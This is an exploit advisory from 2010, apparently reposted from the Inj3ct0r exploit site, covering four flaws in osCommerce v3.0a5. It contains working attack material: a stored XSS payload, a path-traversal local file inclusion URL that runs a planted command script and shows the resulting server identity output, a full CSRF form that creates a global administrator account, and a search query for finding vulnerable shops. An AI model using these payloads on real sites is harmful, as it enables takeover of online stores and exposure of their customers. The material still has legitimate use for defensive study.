Home / os / win7

osCommerce v3.0a5 Multiple Vulnerabilities

Posted on 30 April 2010

<!DOCTYPE HTML PUBLIC '-//W3C//DTD HTML 4.01 Transitional//EN'><html><head><meta http-equiv='Content-Type' content='text/html; charset=windows-1251'><title>osCommerce v3.0a5 Multiple Vulnerabilities</title><link rel='shortcut icon' href='/favicon.ico' type='image/x-icon'><link rel='alternate' type='application/rss+xml' title='Inj3ct0r RSS' href='/rss'></head><body><pre>==========================================
osCommerce v3.0a5 Multiple Vulnerabilities
==========================================


#   [Vendor SW]:    osCommerce
#   [Version]:      3.0a5 (but possible all versions)
#   [Vendor URL]:   www.oscommerce.com
#   [Tested on]:    Ubuntu Server 9.10
#   [Category]:     Webapps/0day 
#
#   [Date]:         30 Apr 2010
#   [Author]:       Alberto Fontanella
#   [Author WEB]:   ictsec.wordpress.com
#   [Author EMAIL]: itsicurezza&lt;0x40&gt;yahoo.it
#
#
#   inText:&quot;Powered by osCommerce&quot; -&gt; 6.850.000                     
#
#



[ 1 ] - [ Full Path Disclosure ]

   http://[host]/templates/default/content/index/product_listing.php
   http://[host]/templates/default/content/info/info_contact.php
   ...etc

   Fatal error: Call to undefined function osc_image() in
   /var/www/templates/default/content/index/product_listing.php on
   line 16

   http://[host]/includes/classes/search.php
   ...etc

   Warning: require(includes/classes/products.php) [function.require]:
   failed to open stream: No such file or directory in
   /var/www/includes/classes/search.php on line 15

   Fatal error: require() [function.require]: Failed opening required
   'includes/classes/products.php'
   (include_path='.:/usr/share/php:/usr/share/pear') in
   /var/www/includes/classes/search.php on line 15



[ 2 ] - [ Persistent XSS ]

   http://[host]/products.php?oscommerce-tshirt

   Put in Front field: &lt;script&gt;alert(&quot;XSS&quot;)&lt;/script&gt;
   Click &quot;Add to Cart&quot;

   Checkout section recalls XSS stored.



[ 3 ] - [ Local File Inclusion ]

   http://[host]/admin/includes/applications/services/pages/uninstall.php?module=../../../../../../../../cmd
   ...etc

   You have to put cmd.php in /

   uid=33(www-data) gid=33(www-data) groups=33(www-data) Linux ubuntu
   2.6.31-14-generic #48-Ubuntu SMP Fri Oct 16 14:04:26 UTC 2009 i686 GNU/Linux 



[ 4 ] - [ XSRF ]

   To create a new Administrator with Global Privileges:

   &lt;html&gt;
     &lt;body&gt;
     &lt;form action=&quot;http://[host]/admin/index.php?administrators&amp;action=save&quot; method=&quot;post&quot;&gt;
     &lt;input type=&quot;text&quot; name=&quot;user_name&quot; value=&quot;haxor&quot;&gt;
     &lt;input type=&quot;text&quot; name=&quot;user_password&quot; value=&quot;hax0r&quot;&gt;
     &lt;input type=&quot;text&quot; name=&quot;modules[]&quot; value=&quot;0&quot;&gt;
     &lt;input type=&quot;hidden&quot; name=&quot;subaction&quot; value=&quot;confirm&quot;/&gt;
     &lt;input type=&quot;submit&quot; value=&quot;Save&quot;&gt;
     &lt;/form&gt;
     &lt;/body&gt;
    &lt;/html&gt;

    ...etc


[ EOF ]


# <a href='http://inj3ct0r.com/'>Inj3ct0r.com</a> [2010-04-30]</pre><script type='text/javascript'>var gaJsHost = (("https:" == document.location.protocol) ? "https://ssl." : "http://www.");document.write(unescape("%3Cscript src='" + gaJsHost + "google-analytics.com/ga.js' type='text/javascript'%3E%3C/script%3E"));</script><script type='text/javascript'>try{var pageTracker = _gat._getTracker("UA-12725838-1");pageTracker._setDomainName("none");pageTracker._setAllowLinker(true);pageTracker._trackPageview();}catch(err){}</script></body></html>

 

TOP

Malware :

Exploits :